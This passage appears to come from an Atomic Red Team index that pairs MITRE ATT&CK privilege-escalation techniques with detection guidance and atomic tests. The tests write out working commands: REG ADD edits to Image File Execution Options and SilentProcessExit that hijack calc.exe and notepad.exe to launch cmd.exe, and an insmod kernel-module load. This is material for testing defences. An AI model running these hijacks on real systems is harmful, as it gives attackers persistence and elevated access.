adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This may be a necessary step for an adversary compromising a endpoint system that has been properly configured and limits other privilege escalation methods. 
- name: Exploitation for Privilege Escalation - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839 - x_mitre_version: '1.2' - x_mitre_data_sources: - - Windows Error Reporting - - Process monitoring - - Application logs - x_mitre_detection: |- - Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution or evidence of Discovery. - - Higher privileges are often necessary to perform additional actions such as some methods of [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Look for additional activity that may indicate an adversary has gained higher privileges. - x_mitre_effective_permissions: - - User - x_mitre_permissions_required: - - User - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_is_subtechnique: false - atomic_tests: [] - T1055.011: - technique: - external_references: - - source_name: mitre-attack - external_id: T1055.011 - url: https://attack.mitre.org/techniques/T1055/011 - - url: https://msdn.microsoft.com/library/windows/desktop/ms633574.aspx - description: Microsoft. (n.d.). About Window Classes. Retrieved December 16, - 2017. - source_name: Microsoft Window Classes - - url: https://msdn.microsoft.com/library/windows/desktop/ms633584.aspx - description: Microsoft. (n.d.). GetWindowLong function. Retrieved December - 16, 2017. - source_name: Microsoft GetWindowLong function - - url: https://msdn.microsoft.com/library/windows/desktop/ms633591.aspx - description: Microsoft. (n.d.). SetWindowLong function. Retrieved December - 16, 2017. 
- source_name: Microsoft SetWindowLong function - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 - - url: https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html - description: MalwareTech. (2013, August 13). PowerLoader Injection – Something - truly amazing. Retrieved December 16, 2017. - source_name: MalwareTech Power Loader Aug 2013 - - url: https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/ - description: Matrosov, A. (2013, March 19). Gapz and Redyms droppers based - on Power Loader code. Retrieved December 16, 2017. - source_name: WeLiveSecurity Gapz and Redyms Mar 2013 - - url: https://msdn.microsoft.com/library/windows/desktop/ms644953.aspx - description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December - 16, 2017. - source_name: Microsoft SendNotifyMessage function - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Extra Window Memory Injection - description: "Adversaries may inject malicious code into process via Extra Window - Memory (EWM) in order to evade process-based defenses as well as possibly - elevate privileges. EWM injection is a method of executing arbitrary code - in the address space of a separate live process. 
\n\nBefore creating a window, - graphical Windows-based processes must prescribe to or register a windows - class, which stipulate appearance and behavior (via windows procedures, which - are functions that handle input/output of data).(Citation: Microsoft Window - Classes) Registration of new windows classes can include a request for up - to 40 bytes of EWM to be appended to the allocated memory of each instance - of that class. This EWM is intended to store data specific to that window - and has specific application programming interface (API) functions to set - and get its value. (Citation: Microsoft GetWindowLong function) (Citation: - Microsoft SetWindowLong function)\n\nAlthough small, the EWM is large enough - to store a 32-bit pointer and is often used to point to a windows procedure. - Malware may possibly utilize this memory location in part of an attack chain - that includes writing code to shared sections of the process’s memory, placing - a pointer to the code in EWM, then invoking execution by returning execution - control to the address in the process’s EWM.\n\nExecution granted through - EWM injection may allow access to both the target process's memory and possibly - elevated privileges. Writing payloads to shared sections also avoids the use - of highly monitored API calls such as WriteProcessMemory and - CreateRemoteThread.(Citation: Endgame Process Injection July - 2017) More sophisticated malware samples may also potentially bypass protection - mechanisms such as data execution prevention (DEP) by triggering a combination - of windows procedures and other system functions that will rewrite the malicious - payload inside an executable portion of the target process. (Citation: MalwareTech - Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)\n\nRunning - code in the context of another process may allow access to the process's memory, - system/network resources, and possibly elevated privileges. 
Execution via - EWM injection may also evade detection from security products since the execution - is masked under a legitimate process. " - id: attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-06-20T22:26:33.191Z' - created: '2020-01-14T17:18:32.126Z' - x_mitre_defense_bypassed: - - Anti-virus - - Application control - x_mitre_detection: 'Monitor for API calls related to enumerating and manipulating - EWM such as GetWindowLong (Citation: Microsoft GetWindowLong function) and - SetWindowLong (Citation: Microsoft SetWindowLong function). Malware associated - with this technique have also used SendNotifyMessage (Citation: Microsoft - SendNotifyMessage function) to trigger the associated window procedure and - eventual malicious injection. (Citation: Endgame Process Injection July 2017)' - x_mitre_data_sources: - - Process monitoring - - API monitoring - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Windows - atomic_tests: [] - T1484: - technique: - external_references: - - source_name: mitre-attack - external_id: T1484 - url: https://attack.mitre.org/techniques/T1484 - - source_name: TechNet Group Policy Basics - url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/ - description: 'srachui. (2012, February 13). Group Policy Basics – Part 1: - Understanding the Structure of a Group Policy Object. Retrieved March 5, - 2019.' - - source_name: ADSecurity GPO Persistence 2016 - url: https://adsecurity.org/?p=2716 - description: 'Metcalf, S. (2016, March 14). Sneaky Active Directory Persistence - #17: Group Policy. Retrieved March 5, 2019.' - - source_name: Wald0 Guide to GPOs - url: https://wald0.com/?p=179 - description: Robbins, A. 
(2018, April 2). A Red Teamer’s Guide to GPOs and - OUs. Retrieved March 5, 2019. - - source_name: Harmj0y Abusing GPO Permissions - url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/ - description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved - March 5, 2019. - - source_name: Mandiant M Trends 2016 - url: https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf - description: Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved - March 5, 2019. - - source_name: Microsoft Hacking Team Breach - url: https://www.microsoft.com/security/blog/2016/06/01/hacking-team-breach-a-cyber-jurassic-park/ - description: 'Microsoft Secure Team. (2016, June 1). Hacking Team Breach: - A Cyber Jurassic Park. Retrieved March 5, 2019.' - - source_name: Harmj0y SeEnableDelegationPrivilege Right - url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/ - description: Schroeder, W. (2017, January 10). The Most Dangerous User Right - You (Probably) Have Never Heard Of. Retrieved March 5, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Group Policy Modification - description: "Adversaries may modify Group Policy Objects (GPOs) to subvert - the intended discretionary access controls for a domain, usually with the - intention of escalating privileges on the domain. Group policy allows for - centralized management of user and computer settings in Active Directory (AD). - GPOs are containers for group policy settings made up of files stored within - a predicable network path \\\\<DOMAIN>\\SYSVOL\\<DOMAIN>\\Policies\\.(Citation: - TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) \n\nLike - other objects in AD, GPOs have access controls associated with them. 
By default - all user accounts in the domain have permission to read GPOs. It is possible - to delegate GPO access control permissions, e.g. write access, to specific - users or groups in the domain.\n\nMalicious GPO modifications can be used - to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), - [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), - [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create - Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1035), - \ and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide - to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends - 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many - user and machine settings in the AD environment, there are a great number - of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide - to GPOs)\n\nFor example, publicly available scripts such as New-GPOImmediateTask - can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) - by modifying GPO settings, in this case modifying <GPO_PATH>\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml.(Citation: - Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases - an adversary might modify specific user rights like SeEnableDelegationPrivilege, - set in <GPO_PATH>\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf, - to achieve a subtle AD backdoor with complete control of the domain because - the user account under the adversary's control would then be able to modify - GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)\n" - id: attack-pattern--ebb42bbe-62d7-47d7-a55f-3b08b61d792d - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - 
kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-26T21:17:41.231Z' - created: '2019-03-07T14:10:32.650Z' - x_mitre_is_subtechnique: false - x_mitre_defense_bypassed: - - System access controls - - File system access controls - x_mitre_detection: "It is possible to detect GPO modifications by monitoring - directory service changes using Windows event logs. Several events may be - logged for such GPO modifications, including:\n\n* Event ID 5136 - A directory - service object was modified\n* Event ID 5137 - A directory service object - was created\n* Event ID 5138 - A directory service object was undeleted\n* - Event ID 5139 - A directory service object was moved\n* Event ID 5141 - A - directory service object was deleted\n\n\nGPO abuse will often be accompanied - by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), - which will have events associated with it to detect. Subsequent permission - value modifications, like those to SeEnableDelegationPrivilege, can also be - searched for in events associated with privileges assigned to new logons (Event - ID 4672) and assignment of user rights (Event ID 4704). " - x_mitre_version: '1.1' - x_mitre_permissions_required: - - Administrator - - User - x_mitre_data_sources: - - Windows event logs - x_mitre_contributors: - - Itamar Mizrahi, Cymptom - - Tristan Bennett, Seamless Intelligence - x_mitre_platforms: - - Windows - atomic_tests: [] - T1574: - technique: - external_references: - - source_name: mitre-attack - external_id: T1574 - url: https://attack.mitre.org/techniques/T1574 - - source_name: Autoruns for Windows - url: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - description: Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. - Retrieved March 13, 2020. 
- object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Hijack Execution Flow - description: |- - Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution. - - There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads. - id: attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-10-17T15:15:28.288Z' - created: '2020-03-12T20:38:12.465Z' - x_mitre_data_sources: - - Environment variable - - Loaded DLLs - - Process command-line parameters - - Process monitoring - - File monitoring - - DLL monitoring - x_mitre_detection: |- - Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. 
Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious. - - Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data. - - Monitor for changes to environment variables, as well as the commands to implement these changes. - - Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so, abnormal process call trees). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates. - - Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. - - Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. 
- x_mitre_defense_bypassed: - - Anti-virus - - Application control - x_mitre_version: '1.0' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Linux - - macOS - - Windows - atomic_tests: [] - T1546.012: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.012 - url: https://attack.mitre.org/techniques/T1546/012 - - url: https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/ - description: Shanbhag, M. (2010, March 24). Image File Execution Options (IFEO). - Retrieved December 18, 2017. - source_name: Microsoft Dev Blog IFEO Mar 2010 - - url: https://docs.microsoft.com/windows-hardware/drivers/debugger/gflags-overview - description: Microsoft. (2017, May 23). GFlags Overview. Retrieved December - 18, 2017. - source_name: Microsoft GFlags Mar 2017 - - url: https://docs.microsoft.com/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit - description: Marshall, D. & Griffin, S. (2017, November 28). Monitoring Silent - Process Exit. Retrieved June 27, 2018. - source_name: Microsoft Silent Process Exit NOV 2017 - - url: https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/ - description: Moe, O. (2018, April 10). Persistence using GlobalFlags in Image - File Execution Options - Hidden from Autoruns.exe. Retrieved June 27, 2018. - source_name: Oddvar Moe IFEO APR 2018 - - url: http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/ - description: Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. - Retrieved November 12, 2014. - source_name: Tilbury 2014 - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' 
- source_name: Endgame Process Injection July 2017 - - url: https://www.f-secure.com/v-descs/backdoor_w32_hupigon_emv.shtml - description: FSecure. (n.d.). Backdoor - W32/Hupigon.EMV - Threat Description. - Retrieved December 18, 2017. - source_name: FSecure Hupigon - - url: https://www.symantec.com/security_response/writeup.jsp?docid=2008-062807-2501-99&tabid=2 - description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December - 18, 2017. - source_name: Symantec Ushedix June 2008 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Image File Execution Options Injection - description: |- - Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010) - - IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ where <executable> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010) - - IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). 
(Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) - - Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014) - - Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Endgame Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation. - - Malware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that redirect and effectively disable various system and security applications. 
(Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008) - id: attack-pattern--6d4a7fb3-5a24-42be-ae61-6728a2b581f6 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-08-26T14:18:08.480Z' - created: '2020-01-24T15:05:58.384Z' - x_mitre_version: '1.1' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - SYSTEM - x_mitre_detection: |- - Monitor for abnormal usage of the GFlags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010) - - Monitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. 
(Citation: Endgame Process Injection July 2017) - x_mitre_data_sources: - - API monitoring - - Windows event logs - - Windows Registry - - Process command-line parameters - - Process monitoring - x_mitre_contributors: - - Oddvar Moe, @oddvarmoe - x_mitre_platforms: - - Windows - identifier: T1546.012 - atomic_tests: - - name: IFEO Add Debugger - auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8 - description: 'Leverage Global Flags Settings - -' - supported_platforms: - - windows - input_arguments: - target_binary: - description: Binary To Attach To - type: Path - default: C:\Windows\System32\calc.exe - payload_binary: - description: Binary To Execute - type: Path - default: C:\Windows\System32\cmd.exe - executor: - command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" - -' - cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows - NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger - /f >nul 2>&1 - -' - name: command_prompt - elevation_required: true - - name: IFEO Global Flags - auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 - description: 'Leverage Global Flags Settings - -' - supported_platforms: - - windows - input_arguments: - target_binary: - description: Binary To Attach To - type: Path - default: C:\Windows\System32\notepad.exe - payload_binary: - description: Binary To Execute - type: Path - default: C:\Windows\System32\cmd.exe - executor: - command: | - REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /t REG_DWORD /d 512 - REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /t REG_DWORD /d 1 - REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /d "#{payload_binary}" - cleanup_command: | - reg delete 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /f >nul 2>&1 - reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /f >nul 2>&1 - reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /f >nul 2>&1 - name: command_prompt - elevation_required: true - T1547.006: - technique: - external_references: - - source_name: mitre-attack - external_id: T1547.006 - url: https://attack.mitre.org/techniques/T1547/006 - - source_name: Linux Kernel Programming - url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf - description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel - Module Programming Guide. Retrieved April 6, 2018. - - url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html - description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs. - Retrieved April 6, 2018. - source_name: Linux Kernel Module Programming Guide - - url: http://www.megasecurity.org/papers/Rootkits.pdf - description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved - April 6, 2018. - source_name: iDefense Rootkit Overview - - url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html - description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility - to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.' - source_name: Volatility Phalanx2 - - url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/ - description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. - Retrieved December 21, 2017. - source_name: CrowdStrike Linux Rootkit - - url: https://github.com/f0rb1dd3n/Reptile - description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved - April 9, 2018. - source_name: GitHub Reptile - - url: https://github.com/m0nad/Diamorphine - description: Mello, V. 
(2018, March 8). Diamorphine - LMK rootkit for Linux - Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018. - source_name: GitHub Diamorphine - - url: https://www.rsaconference.com/writable/presentations/file_upload/ht-r03-malware-persistence-on-os-x-yosemite_final.pdf - description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite. - Retrieved April 6, 2018. - source_name: RSAC 2015 San Francisco Patrick Wardle - - url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/ - description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel - Extension Loading’ is Broken. Retrieved April 6, 2018. - source_name: Synack Secure Kernel Extension Broken - - url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/ - description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble - your MacOS spy. Retrieved April 6, 2018.' - source_name: Securelist Ventir - - source_name: Trend Micro Skidmap - url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/ - description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux - Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. - Retrieved June 4, 2020. - - url: http://tldp.org/HOWTO/Module-HOWTO/x197.html - description: Henderson, B. (2006, September 24). How To Insert And Remove - LKMs. Retrieved April 9, 2018. - source_name: Linux Loadable Kernel Module Insert and Remove LKMs - - url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux - description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved - April 9, 2018. 
- source_name: Wikipedia Loadable Kernel Module - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Kernel Modules and Extensions - description: |- - Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming)  - - When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview) - - Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands. - - Adversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. 
(Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap) - id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-06-30T21:23:15.188Z' - created: '2020-01-24T17:42:23.339Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - root - x_mitre_detection: |- - Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands:modprobe, insmod, lsmod, rmmod, or modinfo (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module) - - For macOS, monitor for execution of kextload commands and correlate with other unknown or suspicious activity. - - Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. 
On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r) On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r) - x_mitre_data_sources: - - Process monitoring - - Process command-line parameters - x_mitre_contributors: - - Anastasios Pingios - - Jeremy Galloway - - Red Canary - x_mitre_platforms: - - macOS - - Linux - identifier: T1547.006 - atomic_tests: - - name: Linux - Load Kernel Module via insmod - auto_generated_guid: 687dcb93-9656-4853-9c36-9977315e9d23 - description: 'This test uses the insmod command to load a kernel module for - Linux. - -' - supported_platforms: - - linux - input_arguments: - module_name: - description: Name of the kernel module name. - type: string - default: T1547006 - module_path: - description: Folder used to store the module. - type: path - default: "/tmp/T1547.006/T1547006.ko" - temp_folder: - description: Temp folder used to compile the code. - type: path - default: "/tmp/T1547.006" - module_source_path: - description: Path to download Gsecdump binary file - type: url - default: PathToAtomicsFolder/T1547.006/src - dependency_executor_name: bash - dependencies: - - description: 'The kernel module must exist on disk at specified location - -' - prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi; - -' - get_prereq_command: | - if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; - cp #{module_source_path}/* #{temp_folder}/ - cd #{temp_folder}; make - if [ ! 
-f #{module_path} ]; then mv #{temp_folder}/#{module_name}.ko #{module_path}; fi; - executor: - command: 'sudo insmod #{module_path} - -' - cleanup_command: | - sudo rmmod #{module_name} - [ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder} - name: bash - elevation_required: true - T1546.006: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.006 - url: https://attack.mitre.org/techniques/T1546/006 - - url: https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf - description: Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved - July 10, 2017. - source_name: Writing Bad Malware for OSX - - url: https://www.rsaconference.com/writable/presentations/file_upload/ht-r03-malware-persistence-on-os-x-yosemite_final.pdf - description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. - Retrieved July 10, 2017. - source_name: Malware Persistence on OS X - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: LC_LOAD_DYLIB Addition - description: |- - Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies. (Citation: Writing Bad Malware for OSX) There are tools available to perform these changes. - - Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. 
